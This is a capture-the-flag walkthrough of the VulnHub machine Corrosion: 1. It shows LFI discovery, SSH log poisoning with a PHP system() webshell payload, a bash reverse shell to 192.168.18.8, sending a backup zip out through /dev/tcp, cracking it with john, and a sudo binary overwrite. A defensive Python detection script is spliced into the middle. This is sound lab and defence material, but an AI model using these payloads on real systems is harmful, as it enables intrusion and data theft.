- Name: Corrosion: 1
- Date release: 31 Jul 2021
- Author: Proxy Programmer
- Series: Corrosion
Download the machine:
https://www.vulnhub.com/entry/corrosion-1,730/
Overview
- Enumeration leads to a blog-post folder; enumerate that folder again to find an archives folder
- Use ffuf to find a URL parameter for an LFI vulnerability
- A log poisoning vulnerability is present
- Inject a PHP backdoor into the logs
- Attach a reverse shell through the PHP backdoor
- Find a user backup zip and transfer it to the attacking machine
- Crack the zip file with john to gain some creds and other files
- Once user access is gained via SSH, check sudo permissions
- Write a binary and overwrite the main file to get root access
Enumeration
Run an nmap scan to find open ports.

Run a gobuster scan to find hidden directories.

Web server

/tasks


Couldn’t find any more clues, so I decided to enumerate the blog-post directory.

Found an archives folder that contains a PHP log file.



Let’s test the payload.

Since the to-do list indicates to change the authentication of the log file, let’s see if we can access it.

Let’s test a log poisoning attack with a random username.

Since log poisoning is a possibility, let’s inject it with a backdoor. You can read more about it here.
Payload: '<?php system($_GET["cmd"]); ?>'
SSH to the machine with the above payload.

Payload is injected.

Let’s enter id to test the payload.


Now inject a bash reverse shell. Make sure to URL encode the file and start a netcat listener.
bash -c 'bash -i >& /dev/tcp/192.168.18.8/1234 0>&1'
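Both halves of this step leave traces a defender can search for. The following is an added example, not part of the original walkthrough: it flags sshd log entries whose username field contains a PHP tag, and web requests whose parameter value points at a log path. The log lines, `page.php` and the `file` parameter are constructed placeholders, since the real names are not given in the text.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines for illustration (not captured from the machine).
AUTH_LOG = [
    'Aug  1 10:02:11 host sshd[1201]: Invalid user alice from 192.168.18.8 port 50122',
    'Aug  1 10:03:40 host sshd[1207]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.18.8 port 50130',
    'Aug  1 10:05:02 host sshd[1215]: Accepted password for randy from 192.168.18.8 port 50144 ssh2',
]
# page.php and the "file" parameter are hypothetical names.
ACCESS_LOG = [
    '192.168.18.8 - - [01/Aug/2021:10:01:00 +0000] "GET /blog-post/ HTTP/1.1" 200 512',
    '192.168.18.8 - - [01/Aug/2021:10:04:10 +0000] "GET /page.php?file=/var/log/auth.log&cmd=id HTTP/1.1" 200 9001',
    '192.168.18.8 - - [01/Aug/2021:10:04:30 +0000] "GET /page.php?file=..%2f..%2fvar%2flog%2fauth.log HTTP/1.1" 200 9001',
]

PHP_TAG = re.compile(r'<\?(php|=)', re.I)
# Username field of failed sshd logins; it may contain spaces, so match up to the last " from ".
SSHD_USER = re.compile(
    r'sshd\[\d+\]: (?:Invalid user|Failed password for(?: invalid user)?) (.*) from \S+ port \d+')
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Parameter values that reference log or proc paths, or climb directories.
LOG_PATH = re.compile(r'(^|/)(var/log/|proc/self/)|\.\./', re.I)

def poisoned_auth_lines(lines):
    """Return (line_no, username) for sshd entries whose username holds a PHP tag."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = SSHD_USER.search(line)
        if m and PHP_TAG.search(m.group(1)):
            hits.append((n, m.group(1)))
    return hits

def log_include_requests(lines):
    """Return (line_no, param, decoded_value) for requests that include a log path."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes
            if LOG_PATH.search(value):
                hits.append((n, key, value))
    return hits

if __name__ == "__main__":
    print(poisoned_auth_lines(AUTH_LOG))
    print(log_include_requests(ACCESS_LOG))
```

A hit from the first check followed shortly by a hit from the second, from the same source address, matches the sequence described above.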
Foothold
User access gained.

I upgraded the shell and tried to access the randy folder but we don’t have permissions. We don’t have sudo permissions either.

After some time enumerating the folders, I found a user backup zip file. I used netcat to transfer the file to my local machine.
On your local machine use this command to receive the file: nc -nlvp 4444 > user.zip
On the target machine use this to send the file: cat user_backup.zip > /dev/tcp/192.168.18.8/4444

Now that we have the file, it is password protected, so we need to break into it.
Use zip2john | tee hash and then john to crack the hash.

Unzip the file and we get the following.

Read the password and we are able to SSH into the randy user.

Check sudo permissions.

Found the first flag.

Privilege escalation
We head to the tools folder and find the easysysinfo tools.

I remember seeing an easysysinfo file in the zipped file, but it is written in C instead of Python.

Let’s replicate this file but add a bash shell inside the code.

Compile the file and set the output as the easysysinfo main file to overwrite it.

Root access will be gained.
